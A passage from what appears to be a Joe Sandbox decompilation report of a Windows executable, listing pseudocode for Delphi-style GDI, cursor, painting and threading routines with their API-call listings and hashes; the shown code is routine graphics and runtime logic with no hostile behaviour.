                                  						_push(_t46);
                                  						_push(0x421e97);
                                  						_push( *[fs:eax]);
                                  						 *[fs:eax] = _t49;
                                  						SetDIBColorTable(_v16, 0, _t34,  &_v1044);
                                  						_pop(_t41);
                                  						 *[fs:eax] = _t41;
                                  						_push(0x421e9e);
                                  						SelectObject(_v16, _v20);
                                  						DeleteDC(_v16);
                                  						_t31 = _v12;
                                  						_push(_t31);
                                  						_push(0);
                                  						L00406944();
                                  						return _t31;
                                  					}
                                  				}
                                  			}

                                  APIs
                                    • Part of subcall function 0041F480: GetObjectA.GDI32(00000000,00000004), ref: 0041F497
                                    • Part of subcall function 0041F480: 72E7AEA0.GDI32(00000000,00000000,?,00000028,00000000,00000004,?,000000FF,00000000,00000018,00000000,004220F2,00000000,00422248,?,00000000), ref: 0041F4BA
                                  • 72E7AC50.USER32(00000000), ref: 00421E26
                                  • 72E7A590.GDI32(?,00000000), ref: 00421E32
                                  • SelectObject.GDI32(?), ref: 00421E3F
                                  • SetDIBColorTable.GDI32(?,00000000,00000000,?,00000000,00421E97,?,?,?,?,00000000), ref: 00421E63
                                  • SelectObject.GDI32(?,?), ref: 00421E7D
                                  • DeleteDC.GDI32(?), ref: 00421E86
                                  • 72E7B380.USER32(00000000,?,?,?,?,00421E9E,?,00000000,00421E97,?,?,?,?,00000000), ref: 00421E91
                                  Similarity
                                  • API ID: Object$Select$A590B380ColorDeleteTable
                                  • String ID:
                                  • API String ID: 980243606-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 94%
                                  			E00453FAC(struct HICON__* __eax, short __edx) {
                                  				short _v18;
                                  				long _v20;
                                  				struct tagPOINT _v28;
                                  				struct HICON__* _t11;
                                  				long _t16;
                                  				struct HICON__* _t25;
                                  				struct HWND__* _t31;
                                  				short _t32;
                                  				struct tagPOINT* _t34;
                                  
                                  				_t11 = __eax;
                                  				_t32 = __edx;
                                  				_t25 = __eax;
                                  				if(__edx ==  *((intOrPtr*)(__eax + 0x44))) {
                                  					L6:
                                  					 *((intOrPtr*)(_t25 + 0x48)) =  *((intOrPtr*)(_t25 + 0x48)) + 1;
                                  					return _t11;
                                  				}
                                  				 *((short*)(__eax + 0x44)) = __edx;
                                  				if(__edx != 0) {
                                  					L5:
                                  					_t11 = SetCursor(E00453F84(_t25, _t32));
                                  					goto L6;
                                  				}
                                  				GetCursorPos(_t34);
                                  				_push(_v28.y);
                                  				_t31 = WindowFromPoint(_v28.x);
                                  				if(_t31 == 0) {
                                  					goto L5;
                                  				}
                                  				_t16 = GetWindowThreadProcessId(_t31, 0);
                                  				if(_t16 != GetCurrentThreadId()) {
                                  					goto L5;
                                  				}
                                  				_v20 = _v28 & 0x0000ffff;
                                  				_v18 = _v28.y & 0x0000ffff;
                                  				return SendMessageA(_t31, 0x20, _t31, SendMessageA(_t31, 0x84, 0, _v20) & 0x0000ffff | 0x200 << 0x00000010);
                                  			}

                                  APIs
                                  • GetCursorPos.USER32 ref: 00453FCB
                                  • WindowFromPoint.USER32(?,?), ref: 00453FD8
                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00453FE6
                                  • GetCurrentThreadId.KERNEL32 ref: 00453FED
                                  • SendMessageA.USER32(00000000,00000084,00000000,?), ref: 00454016
                                  • SendMessageA.USER32(00000000,00000020,00000000,?), ref: 0045402F
                                  • SetCursor.USER32(00000000), ref: 00454041
                                  Similarity
                                  • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                  • String ID:
                                  • API String ID: 1770779139-0
                                  • Opcode ID: c57d43a932ef160239e67c2128a84e9ecdd7c6b71d8355c857ef7937fc0a89f1
                                  • Instruction ID: f184af56feafb0872215b00da1a3adc24629ecb2e9015eb0eb1613087fa9d4db
                                  • Opcode Fuzzy Hash: c57d43a932ef160239e67c2128a84e9ecdd7c6b71d8355c857ef7937fc0a89f1
                                  • Instruction Fuzzy Hash: D301C85510431065D6306B764C81A3B79A8DFC4B99F10452FBA84AB2D3E63ECC54936E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040B768(void* __edx, void* __edi, void* __fp0) {
                                  				void _v1024;
                                  				char _v1088;
                                  				long _v1092;
                                  				void* _t12;
                                  				char* _t14;
                                  				intOrPtr _t16;
                                  				intOrPtr _t18;
                                  				intOrPtr _t24;
                                  				long _t32;
                                  
                                  				E0040B5E0(_t12,  &_v1024, __edx, __fp0, 0x400);
                                  				_t14 =  *0x46fcb0; // 0x470048
                                  				if( *_t14 == 0) {
                                  					_t16 =  *0x46fa6c; // 0x406dc4
                                  					_t9 = _t16 + 4; // 0xffe9
                                  					_t18 =  *0x470664; // 0x400000
                                  					LoadStringA(E004051B8(_t18),  *_t9,  &_v1088, 0x40);
                                  					return MessageBoxA(0,  &_v1024,  &_v1088, 0x2010);
                                  				}
                                  				_t24 =  *0x46fac8; // 0x470218
                                  				E0040284C(E00402BD8(_t24));
                                  				CharToOemA( &_v1024,  &_v1024);
                                  				_t32 = E004088D8( &_v1024, __edi);
                                  				WriteFile(GetStdHandle(0xfffffff4),  &_v1024, _t32,  &_v1092, 0);
                                  				return WriteFile(GetStdHandle(0xfffffff4), 0x40b82c, 2,  &_v1092, 0);
                                  			}













                                  APIs
                                    • Part of subcall function 0040B5E0: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040B5FD
                                    • Part of subcall function 0040B5E0: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040B621
                                    • Part of subcall function 0040B5E0: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040B63C
                                    • Part of subcall function 0040B5E0: LoadStringA.USER32 ref: 0040B6D2
                                  • CharToOemA.USER32 ref: 0040B79F
                                  • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0040B7BC
                                  • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040B7C2
                                  • GetStdHandle.KERNEL32(000000F4,0040B82C,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040B7D7
                                  • WriteFile.KERNEL32(00000000,000000F4,0040B82C,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040B7DD
                                  • LoadStringA.USER32 ref: 0040B7FF
                                  • MessageBoxA.USER32 ref: 0040B815
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                  • String ID:
                                  • API String ID: 185507032-0
                                  • Opcode ID: 054c04a1c004d21c250cc4efb5043ce8ce781a8b84e9d576a91d104cb38680e4
                                  • Instruction ID: e04345ca450840d3a5a22f9931ed623d4f0963e459078fefbfc2eaee3cc778dc
                                  • Opcode Fuzzy Hash: 054c04a1c004d21c250cc4efb5043ce8ce781a8b84e9d576a91d104cb38680e4
                                  • Instruction Fuzzy Hash: 4E1170B21042047AD200FBA5DC42F9B77ECEB44704F40493FF695F60E2EAB8D9448B6A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 89%
                                  			E0044F35C(intOrPtr* __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
                                  				intOrPtr* _v8;
                                  				intOrPtr* _v12;
                                  				struct HDC__* _v16;
                                  				struct tagPAINTSTRUCT _v80;
                                  				struct tagRECT _v96;
                                  				struct tagRECT _v112;
                                  				signed int _v116;
                                  				long _v120;
                                  				void* __ebp;
                                  				void* _t68;
                                  				void* _t94;
                                  				struct HBRUSH__* _t97;
                                  				intOrPtr _t105;
                                  				void* _t118;
                                  				void* _t127;
                                  				intOrPtr _t140;
                                  				intOrPtr _t146;
                                  				void* _t147;
                                  				void* _t148;
                                  				void* _t150;
                                  				void* _t152;
                                  				intOrPtr _t153;
                                  
                                  				_t148 = __esi;
                                  				_t147 = __edi;
                                  				_t138 = __edx;
                                  				_t127 = __ebx;
                                  				_t150 = _t152;
                                  				_t153 = _t152 + 0xffffff8c;
                                  				_v12 = __edx;
                                  				_v8 = __eax;
                                  				_t68 =  *_v12 - 0xf;
                                  				if(_t68 == 0) {
                                  					_v16 =  *(_v12 + 4);
                                  					if(_v16 == 0) {
                                  						 *(_v12 + 4) = BeginPaint( *(_v8 + 0x26c),  &_v80);
                                  					}
                                  					_push(_t150);
                                  					_push(0x44f52a);
                                  					_push( *[fs:eax]);
                                  					 *[fs:eax] = _t153;
                                  					if(_v16 == 0) {
                                  						GetWindowRect( *(_v8 + 0x26c),  &_v96);
                                  						E004346D0(_v8,  &_v120,  &_v96);
                                  						_v96.left = _v120;
                                  						_v96.top = _v116;
                                  						E004333E0( *(_v12 + 4),  ~(_v96.top),  ~(_v96.left));
                                  					}
                                  					E004394B4(_v8, _t127, _v12, _t147, _t148);
                                  					_pop(_t140);
                                  					 *[fs:eax] = _t140;
                                  					_push(0x44f538);
                                  					if(_v16 == 0) {
                                  						return EndPaint( *(_v8 + 0x26c),  &_v80);
                                  					}
                                  					return 0;
                                  				} else {
                                  					_t94 = _t68 - 5;
                                  					if(_t94 == 0) {
                                  						_t97 = E0041DEAC( *((intOrPtr*)(_v8 + 0x178)));
                                  						 *((intOrPtr*)( *_v8 + 0x44))();
                                  						FillRect( *(_v12 + 4),  &_v112, _t97);
                                  						if( *((char*)(_v8 + 0x247)) == 2 &&  *(_v8 + 0x26c) != 0) {
                                  							GetClientRect( *(_v8 + 0x26c),  &_v96);
                                  							FillRect( *(_v12 + 4),  &_v96, E0041DEAC( *((intOrPtr*)(_v8 + 0x178))));
                                  						}
                                  						_t105 = _v12;
                                  						 *((intOrPtr*)(_t105 + 0xc)) = 1;
                                  					} else {
                                  						_t118 = _t94 - 0x2b;
                                  						if(_t118 == 0) {
                                  							E0044F2D0(_t150);
                                  							_t105 = _v8;
                                  							if( *((char*)(_t105 + 0x247)) == 2) {
                                  								if(E0044F884(_v8) == 0 || E0044F31C(_t138, _t150) == 0) {
                                  									_t146 = 1;
                                  								} else {
                                  									_t146 = 0;
                                  								}
                                  								_t105 = E0044C430( *(_v8 + 0x26c), _t146);
                                  							}
                                  						} else {
                                  							if(_t118 != 0x45) {
                                  								_t105 = E0044F2D0(_t150);
                                  							} else {
                                  								E0044F2D0(_t150);
                                  								_t105 = _v12;
                                  								if( *((intOrPtr*)(_t105 + 0xc)) == 1) {
                                  									_t105 = _v12;
                                  									 *((intOrPtr*)(_t105 + 0xc)) = 0xffffffff;
                                  								}
                                  							}
                                  						}
                                  					}
                                  					return _t105;
                                  				}
                                  			}


























                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Rect$FillPaintWindow$BeginCallClientProc
                                  • String ID:
                                  • API String ID: 901200654-0
                                  • Opcode ID: 5bfdd6349aa25f67a9f6ebd84a2fa1f3ff13f5fbdaf69d7e113f7426ae650eed
                                  • Instruction ID: f43634e6c3294c122433758a9ec6d4c20e310822593c055aa72f7a8fa90282fe
                                  • Opcode Fuzzy Hash: 5bfdd6349aa25f67a9f6ebd84a2fa1f3ff13f5fbdaf69d7e113f7426ae650eed
                                  • Instruction Fuzzy Hash: CF510A75A04108EFDB00DFA9D589E9EB7F8AB18314F5581B6E408EB352DB38AE45CF14
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 67%
                                  			E0041990C(void* __eax, void* __ebx, void* __edi, void* __esi) {
                                  				char _v5;
                                  				intOrPtr* _v12;
                                  				long _v16;
                                  				char _v20;
                                  				char _v24;
                                  				long _t22;
                                  				char _t29;
                                  				void* _t53;
                                  				intOrPtr _t61;
                                  				intOrPtr* _t62;
                                  				intOrPtr _t63;
                                  				intOrPtr _t66;
                                  				intOrPtr _t67;
                                  				void* _t72;
                                  				void* _t73;
                                  				intOrPtr _t74;
                                  
                                  				_t72 = _t73;
                                  				_t74 = _t73 + 0xffffffec;
                                  				_push(__esi);
                                  				_push(__edi);
                                  				_t53 = __eax;
                                  				_t22 = GetCurrentThreadId();
                                  				_t62 =  *0x46fdc4; // 0x470030
                                  				if(_t22 !=  *_t62) {
                                  					_v24 = GetCurrentThreadId();
                                  					_v20 = 0;
                                  					_t61 =  *0x46fc4c; // 0x410908
                                  					E0040B928(_t53, _t61, 1, __edi, __esi, 0,  &_v24);
                                  					E00403B64();
                                  				}
                                  				if(_t53 <= 0) {
                                  					E004198E4();
                                  				} else {
                                  					E004198F0(_t53);
                                  				}
                                  				_v16 = 0;
                                  				_push(0x47086c);
                                  				L0040615C();
                                  				_push(_t72);
                                  				_push(0x419ad1);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t74;
                                  				_v16 = InterlockedExchange( &E0046E3E4, _v16);
                                  				_push(_t72);
                                  				_push(0x419ab2);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t74;
                                  				if(_v16 == 0 ||  *((intOrPtr*)(_v16 + 8)) <= 0) {
                                  					_t29 = 0;
                                  				} else {
                                  					_t29 = 1;
                                  				}
                                  				_v5 = _t29;
                                  				if(_v5 == 0) {
                                  					L15:
                                  					_pop(_t63);
                                  					 *[fs:eax] = _t63;
                                  					_push(E00419AB9);
                                  					return E00403398(_v16);
                                  				} else {
                                  					if( *((intOrPtr*)(_v16 + 8)) > 0) {
                                  						_v12 = E00413D2C(_v16, 0);
                                  						E00413C18(_v16, 0);
                                  						L004062A4();
                                  						 *[fs:eax] = _t74;
                                  						 *[fs:eax] = _t74;
                                  						 *((intOrPtr*)( *_v12 + 8))( *[fs:eax], _t72,  *[fs:eax], 0x419a55, _t72, 0x47086c);
                                  						_pop(_t66);
                                  						 *[fs:eax] = _t66;
                                  						_t67 = 0x419a16;
                                  						 *[fs:eax] = _t67;
                                  						_push(E00419A5C);
                                  						_push(0x47086c);
                                  						L0040615C();
                                  						return 0;
                                  					} else {
                                  						goto L15;
                                  					}
                                  				}
                                  			}




















                                  APIs
                                  • GetCurrentThreadId.KERNEL32 ref: 00419917
                                  • GetCurrentThreadId.KERNEL32 ref: 00419926
                                    • Part of subcall function 004198E4: ResetEvent.KERNEL32(0000017C,00419961,?,?,00000000), ref: 004198EA
                                  • RtlEnterCriticalSection.KERNEL32(0047086C,?,?,00000000), ref: 0041996B
                                  • InterlockedExchange.KERNEL32(0046E3E4,?), ref: 00419987
                                  • RtlLeaveCriticalSection.KERNEL32(0047086C,00000000,00419AB2,?,00000000,00419AD1,?,0047086C,?,?,00000000), ref: 004199E0
                                  • RtlEnterCriticalSection.KERNEL32(0047086C,00419A5C,00419AB2,?,00000000,00419AD1,?,0047086C,?,?,00000000), ref: 00419A4F
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: CriticalSection$CurrentEnterThread$EventExchangeInterlockedLeaveReset
                                  • String ID:
                                  • API String ID: 2189153385-0
                                  • Opcode ID: 1bf064d7ae4167a62a5ba19c0f7645c6c79dcab77ae4858d27ace3b683e4dab6
                                  • Instruction ID: 249a752301645a15f5ae1f04a3e4977800e5079047c6a7a711a44c1a2e6a256d
                                  • Opcode Fuzzy Hash: 1bf064d7ae4167a62a5ba19c0f7645c6c79dcab77ae4858d27ace3b683e4dab6
                                  • Instruction Fuzzy Hash: 7431F570A14340AFD701EF66C861AA9B7F8EF49704F5284BBF40496792D77C5C84CA6D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 68%
                                  			E0041F730(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, void* __fp0, int _a4, signed int* _a8) {
                                  				intOrPtr* _v8;
                                  				intOrPtr _v12;
                                  				signed int _v16;
                                  				intOrPtr _v20;
                                  				signed int _v24;
                                  				signed int _v32;
                                  				signed short _v44;
                                  				int _t36;
                                  				signed int _t37;
                                  				signed short _t38;
                                  				signed int _t39;
                                  				signed short _t43;
                                  				signed int* _t47;
                                  				signed int _t51;
                                  				intOrPtr _t61;
                                  				void* _t67;
                                  				void* _t68;
                                  				void* _t69;
                                  				intOrPtr _t70;
                                  
                                  				_t68 = _t69;
                                  				_t70 = _t69 + 0xffffff90;
                                  				_v16 = __ecx;
                                  				_v12 = __edx;
                                  				_v8 = __eax;
                                  				_t47 = _a8;
                                  				_v24 = _v16 << 4;
                                  				_v20 = E00407C6C(_v24, __eflags, __fp0);
                                  				 *[fs:edx] = _t70;
                                  				_t51 = _v24;
                                  				 *((intOrPtr*)( *_v8 + 0xc))( *[fs:edx], 0x41fa29, _t68, __edi, __esi, __ebx, _t67);
                                  				if(( *_t47 | _t47[1]) != 0) {
                                  					_t36 = _a4;
                                  					 *_t36 =  *_t47;
                                  					 *(_t36 + 4) = _t47[1];
                                  				} else {
                                  					 *_a4 = GetSystemMetrics(0xb);
                                  					_t36 = GetSystemMetrics(0xc);
                                  					 *(_a4 + 4) = _t36;
                                  				}
                                  				_push(0);
                                  				L004066E4();
                                  				_v44 = _t36;
                                  				if(_v44 == 0) {
                                  					E0041EBD8(_t51);
                                  				}
                                  				_push(_t68);
                                  				_push(0x41f819);
                                  				_push( *[fs:edx]);
                                  				 *[fs:edx] = _t70;
                                  				_push(0xe);
                                  				_t37 = _v44;
                                  				_push(_t37);
                                  				L0040641C();
                                  				_push(0xc);
                                  				_t38 = _v44;
                                  				_push(_t38);
                                  				L0040641C();
                                  				_t39 = _t37 * _t38;
                                  				if(_t39 <= 8) {
                                  					__eflags = 1;
                                  					_v32 = 1 << _t39;
                                  				} else {
                                  					_v32 = 0x7fffffff;
                                  				}
                                  				_pop(_t61);
                                  				 *[fs:eax] = _t61;
                                  				_push(0x41f820);
                                  				_t43 = _v44;
                                  				_push(_t43);
                                  				_push(0);
                                  				L00406944();
                                  				return _t43;
                                  			}























                                  APIs
                                  • GetSystemMetrics.USER32 ref: 0041F77E
                                  • GetSystemMetrics.USER32 ref: 0041F78A
                                  • 72E7AC50.USER32(00000000), ref: 0041F7A6
                                  • 72E7AD70.GDI32(00000000,0000000E,00000000,0041F819,?,00000000), ref: 0041F7CD
                                  • 72E7AD70.GDI32(00000000,0000000C,00000000,0000000E,00000000,0041F819,?,00000000), ref: 0041F7DA
                                  • 72E7B380.USER32(00000000,00000000,0041F820,0000000E,00000000,0041F819,?,00000000), ref: 0041F813
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: MetricsSystem$B380
                                  • String ID:
                                  • API String ID: 3145338429-0
                                  • Opcode ID: 5c365a7b938f6f4884d2b9144afad8f3c89d0e1754947f4e61d0dd768b66d4c9
                                  • Instruction ID: e1a0fccb058b982b0167cad0ea1306bda6277b63250d80b5e5150878960a8353
                                  • Opcode Fuzzy Hash: 5c365a7b938f6f4884d2b9144afad8f3c89d0e1754947f4e61d0dd768b66d4c9
                                  • Instruction Fuzzy Hash: EE317374A002449FDB00DFA5C881AEEBBF5FB48714F118576E819AB380C738A941CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 45%
                                  			E0041FBA8(struct HBITMAP__* __eax, void* __ebx, struct tagBITMAPINFO* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, void* _a8) {
                                  				char _v5;
                                  				struct HDC__* _v12;
                                  				struct HDC__* _v16;
                                  				struct HDC__* _t29;
                                  				struct tagBITMAPINFO* _t32;
                                  				intOrPtr _t39;
                                  				struct HBITMAP__* _t43;
                                  				void* _t46;
                                  				void* _t52;
                                  
                                  				_t32 = __ecx;
                                  				_t43 = __eax;
                                  				E0041FA54(__eax, _a4, __ecx, _t52);
                                  				_v12 = 0;
                                  				_push(0);
                                  				L00406374();
                                  				_v16 = 0;
                                  				_push(_t46);
                                  				_push(0x41fc45);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t46 + 0xfffffff4;
                                  				if(__edx != 0) {
                                  					_push(0);
                                  					_push(__edx);
                                  					_t29 = _v16;
                                  					_push(_t29);
                                  					L004064E4();
                                  					_v12 = _t29;
                                  					_push(_v16);
                                  					L004064B4();
                                  				}
                                  				_v5 = GetDIBits(_v16, _t43, 0, _t32->bmiHeader.biHeight, _a8, _t32, 0) != 0;
                                  				_pop(_t39);
                                  				 *[fs:eax] = _t39;
                                  				_push(E0041FC4C);
                                  				if(_v12 != 0) {
                                  					_push(0);
                                  					_push(_v12);
                                  					_push(_v16);
                                  					L004064E4();
                                  				}
                                  				return DeleteDC(_v16);
                                  			}













                                  APIs
                                    • Part of subcall function 0041FA54: GetObjectA.GDI32(?,00000054), ref: 0041FA68
                                  • 72E7A590.GDI32(00000000,?,?,?), ref: 0041FBCA
                                  • 72E7B410.GDI32(?,00000000,00000000,00000000,0041FC45,?,00000000,?,?,?), ref: 0041FBEB
                                  • 72E7B150.GDI32(?,?,00000000,00000000,00000000,0041FC45,?,00000000,?,?,?), ref: 0041FBF7
                                  • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041FC0E
                                  • 72E7B410.GDI32(?,00000000,00000000,0041FC4C,?,00000000,?,?,?), ref: 0041FC36
                                  • DeleteDC.GDI32(?), ref: 0041FC3F
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: B410$A590B150BitsDeleteObject
                                  • String ID:
                                  • API String ID: 3837315262-0
                                  • Opcode ID: 62bd1965c6a8086ea459442890f0f70e4a98d9617ad16270d96d09c6f179d0b7
                                  • Instruction ID: 054b00172579a8909992d8f268817eb6bafaa7520bbf52760cef8d6c51f48d10
                                  • Opcode Fuzzy Hash: 62bd1965c6a8086ea459442890f0f70e4a98d9617ad16270d96d09c6f179d0b7
                                  • Instruction Fuzzy Hash: 20115175A042087FDB10DBA9CC81F9EB7FCEF49704F118476B918E7282D678A950C768
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 87%
                                  			E0041F3DC(struct HDC__* __eax, signed short __ecx) {
                                  				char _v1036;
                                  				signed short _v1038;
                                  				struct tagRGBQUAD _v1048;
                                  				short _v1066;
                                  				short* _t15;
                                  				void* _t18;
                                  				struct HDC__* _t23;
                                  				void* _t27;
                                  				short* _t32;
                                  				short* _t33;
                                  
                                  				_t32 = 0;
                                  				 *_t33 = 0x300;
                                  				if(__eax == 0) {
                                  					_v1038 = __ecx;
                                  					E00402990(_t27, __ecx + __ecx + __ecx + __ecx,  &_v1036);
                                  				} else {
                                  					_push(0);
                                  					L00406374();
                                  					_t23 = __eax;
                                  					_t18 = SelectObject(__eax, __eax);
                                  					_v1066 = GetDIBColorTable(_t23, 0, 0x100,  &_v1048);
                                  					SelectObject(_t23, _t18);
                                  					DeleteDC(_t23);
                                  				}
                                  				if(_v1038 != 0) {
                                  					if(_v1038 != 0x10 || E0041F344(_t33) == 0) {
                                  						E0041F1D8( &_v1036, _v1038 & 0x0000ffff);
                                  					}
                                  					_t15 = _t33;
                                  					_push(_t15);
                                  					L0040639C();
                                  					_t32 = _t15;
                                  				}
                                  				return _t32;
                                  			}














                                  APIs
                                  • 72E7A590.GDI32(00000000,00000000,?,?,00423273,?,?,?,?,00421C83,00000000,00421D0F), ref: 0041F3F5
                                  • SelectObject.GDI32(00000000,00000000), ref: 0041F3FE
                                  • GetDIBColorTable.GDI32(00000000,00000000,00000100,?,00000000,00000000,00000000,00000000,?,?,00423273,?,?,?,?,00421C83), ref: 0041F412
                                  • SelectObject.GDI32(00000000,00000000), ref: 0041F41E
                                  • DeleteDC.GDI32(00000000), ref: 0041F424
                                  • 72E7A8F0.GDI32(?,00000000,?,?,00423273,?,?,?,?,00421C83,00000000,00421D0F), ref: 0041F46B
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: ObjectSelect$A590ColorDeleteTable
                                  • String ID:
                                  • API String ID: 1056449717-0
                                  • Opcode ID: 42a3df518f956a9194f157a1b37e07ed0aae3e32bc86873e351531cd0ca31899
                                  • Instruction ID: 9504cd4cc45ce934dc21eeb1b842140465d06d9cc918c3a1e68c36194d52cf3a
                                  • Opcode Fuzzy Hash: 42a3df518f956a9194f157a1b37e07ed0aae3e32bc86873e351531cd0ca31899
                                  • Instruction Fuzzy Hash: 9801847120431066E614B7668C43BAF72A88FC0718F05D93FB989A72C2E57D888A835E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0041EAA8(void* __eax) {
                                  				void* _t36;
                                  
                                  				_t36 = __eax;
                                  				UnrealizeObject(E0041DEAC( *((intOrPtr*)(__eax + 0x14))));
                                  				SelectObject( *(_t36 + 4), E0041DEAC( *((intOrPtr*)(_t36 + 0x14))));
                                  				if(E0041DF8C( *((intOrPtr*)(_t36 + 0x14))) != 0) {
                                  					SetBkColor( *(_t36 + 4),  !(E0041D170(E0041DE70( *((intOrPtr*)(_t36 + 0x14))))));
                                  					return SetBkMode( *(_t36 + 4), 1);
                                  				} else {
                                  					SetBkColor( *(_t36 + 4), E0041D170(E0041DE70( *((intOrPtr*)(_t36 + 0x14)))));
                                  					return SetBkMode( *(_t36 + 4), 2);
                                  				}
                                  			}





                                  APIs
                                    • Part of subcall function 0041DEAC: CreateBrushIndirect.GDI32(?), ref: 0041DF57
                                  • UnrealizeObject.GDI32(00000000), ref: 0041EAB4
                                  • SelectObject.GDI32(?,00000000), ref: 0041EAC6
                                  • SetBkColor.GDI32(?,00000000), ref: 0041EAE9
                                  • SetBkMode.GDI32(?,00000002), ref: 0041EAF4
                                  • SetBkColor.GDI32(?,00000000), ref: 0041EB0F
                                  • SetBkMode.GDI32(?,00000001), ref: 0041EB1A
                                    • Part of subcall function 0041D170: GetSysColor.USER32(?), ref: 0041D17A
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                                  • String ID:
                                  • API String ID: 3527656728-0
                                  • Opcode ID: 8cd827c4f84d517be392d08eed1c220563ee38278a4d5f5f69c386bce2c10c16
                                  • Instruction ID: 822aa195731c7e48ed7a78965d4052e44e8d2372d6082ceb8a0622d70bce6f8f
                                  • Opcode Fuzzy Hash: 8cd827c4f84d517be392d08eed1c220563ee38278a4d5f5f69c386bce2c10c16
                                  • Instruction Fuzzy Hash: 6DF072F5600210ABDF40FFBAD9C6E4B7BAC5F14309705846AB909DF197CA79D8604739
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 88%
                                  			E00423E2C(intOrPtr* __eax, signed char __edx, void* __fp0) {
                                  				intOrPtr* _v8;
                                  				struct HPALETTE__* _v12;
                                  				char _v13;
                                  				intOrPtr _v25;
                                  				intOrPtr _v29;
                                  				intOrPtr _v33;
                                  				intOrPtr _v57;
                                  				short _v59;
                                  				short _v61;
                                  				intOrPtr _v65;
